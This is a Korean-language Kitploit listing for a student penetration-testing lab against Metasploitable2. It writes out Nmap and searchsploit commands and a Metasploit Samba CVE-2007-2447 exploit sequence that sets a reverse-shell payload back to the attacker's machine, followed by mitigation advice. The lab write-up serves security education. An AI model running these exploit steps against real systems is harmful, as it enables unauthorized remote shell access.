Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Penetration-Testing-on-Metasploitable2 — Kali Linux와 Metasploitable2를 사용한 실습형 침투 테스트 프로젝트입니다. 전체 워크플로우 포함: Nmap 스캐닝, 열거, Metasploit 익스플로잇(Samba CVE-2007-2447), 포스트 익스플로잇 검증, 완화 조치 단계. 저장소에는 명령어, 출력 결과, 그리고 공격 기법과 방어 권장 사항을 모두 보여주는 보고서가 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
ReconnaissanceVulnerability ScannersNetwork MappingVulnerability AnalysisExploitationPost-ExploitationPenetration TestingLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

Kali Linux와 Metasploitable2를 사용한 실습형 침투 테스트 프로젝트입니다. 전체 워크플로우 포함: Nmap 스캐닝, 열거, Metasploit 익스플로잇(Samba CVE-2007-2447), 포스트 익스플로잇 검증, 완화 조치 단계. 저장소에는 명령어, 출력 결과, 그리고 공격 기법과 방어 권장 사항을 모두 보여주는 보고서가 포함되어 있습니다.

저장소 보기웹사이트
111개월 전아직 검토되지 않음

인턴십 프로젝트 2 — Metasploitable2 침투 테스트

  • 요약: 이 프로젝트는 정찰, 열거, 익스플로잇, 사후 익스플로잇 검증 및 완화 권장 사항을 포함한 전체 침투 테스트 워크플로우를 보여줍니다. 사용된 대상은 Metasploitable2이고 공격 머신은 Kali Linux입니다.

  • 도구: Kali Linux (공격자) Nmap (정찰) Metasploit Framework (익스플로잇) SearchSploit / Exploit-DB (분류)

수행 단계:

  1. 스캐닝: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x 식별된 서비스 (예시): vsftpd 2.3.4 (포트 21 배너), Samba smbd 3.x (포트 445).
  2. 열거 및 분류: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 서비스를 잠재적 익스플로잇과 매칭 (vsftpd 백도어, Samba username-map).
  3. 익스플로잇
  • vsftpd 백도어 (CVE-2011-2523) 시도 — Nmap 배너는 존재하지만 서비스가 응답하지 않음; 익스플로잇이 세션을 생성하지 못함.
  • Samba (CVE-2007-2447) 익스플로잇 성공: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit 대화형 셸을 획득하고 사용자 컨텍스트를 확인함.
  1. 사후 익스플로잇
  • 시스템 정보 확인: id uname -a
  • 증거 및 스크린샷 수집.
  1. 완화 권장 사항
  • 정기적인 스캐닝 및 자산 인벤토리.
  • 신속한 패치 및 버전 업그레이드 (Samba 업데이트).
  • 중요 포트에 대한 접근 제한 (방화벽 규칙).
  • 사용하지 않는 서비스 및 익명 접근 비활성화.
  • 공유 및 계정에 최소 권한 적용.
  • 네트워크 분리 및 로깅/모니터링.
  • 사고 대응 계획 수립.

결과 Samba 익스플로잇을 통해 원격 셸을 성공적으로 획득하고, 공격 경로를 문서화했으며 완화 계획을 수립했습니다. 전체 로그와 명령 출력은 scans/ 폴더에 저장되어 있습니다.

도구 다운로드